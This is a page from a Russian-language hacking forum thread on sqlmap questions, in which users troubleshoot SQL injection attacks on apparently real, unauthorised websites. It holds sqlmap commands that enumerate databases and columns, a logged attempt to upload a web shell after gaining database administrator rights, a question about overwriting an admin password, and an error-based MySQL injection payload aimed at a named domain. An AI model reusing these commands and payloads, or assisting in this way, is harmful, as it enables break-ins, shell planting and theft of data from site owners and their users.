FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 26 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

29.09.2016, 14:42

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
долго объяснять свою мысль, уже флуд будет

такая же фигня, забили

29.09.2016, 23:22

zagruzkaaa

Новичок

Регистрация: 07.07.2009

Сообщений: 5

Провел на форуме:
994403

Репутация: -5

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды

ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера

03.10.2016, 18:47

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Ничего не могу понять.

[21:06:50] [INFO] testing if current user is DBA

[21:06:50] [INFO] fetching current user

[21:06:50] [INFO] resumed: root@localhost

current user is DBA: True

Цитата:

Сообщение от None

'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE"]

Пытаюсь залить шелл пишет

Цитата:

Сообщение от None

"[WARNING] unable to automatically parse any web server path [INFO] trying to upload the file stager on '/home/ste/public_htm l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method [13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_ html/admin-ste/' [13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir ectory-manager/' via LIMIT 'LINES TERMINATED BY' method [13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active- directory-manager/' [13:46:39] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 8 times"]

03.10.2016, 18:50

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от sinfo

sinfo said:
↑
Ничего не могу понять.
[21:06:50] [INFO] testing if current user is DBA
[21:06:50] [INFO] fetching current user
[21:06:50] [INFO] resumed: root@localhost
current user is DBA: True
Пытаюсь залить шелл пишет

ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

03.10.2016, 18:56

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от t0ma5

t0ma5 said:
↑
ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

А с этими правами я могу перезаписать пасс админа?

03.10.2016, 18:57

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

sinfo said:
↑
А с этими правами я могу перезаписать пасс админа?

Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу.

С начало у вас

/home/ste/public_htm l/admin-ste/

Потом /windows-tools/active- directory-manager/

03.10.2016, 19:02

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Потом /windows-tools/active- directory-manager/

Это уже сам мап такое пишет

04.10.2016, 19:31

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

--crawl=2

06.10.2016, 01:35

masterdolicjakov

Guest

Сообщений: n/a

Провел на форуме:
1489

Репутация: 0

Доброго всем времени суток!

Парни, помогите решить одну проблемку...

В общем суть дела:

Есть сайт на ASP

Нашел мапом две скули.

Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет.

Чекаю так:

1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10

2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10

#10

06.10.2016, 10:03

sinfo

Guest

Сообщений: n/a

Провел на форуме:
4811

Репутация: 0

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: error-based

Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY

CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70

7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2

---

[22:53:16] [INFO] testing MySQL

[22:53:16] [WARNING] reflective value(s) found and filtering out

[22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim

e out(s)

[22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[22:55:16] [CRITICAL] connection timed out to the target URL

пробывал с проски результата нуль(

Страница 26 из 115

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ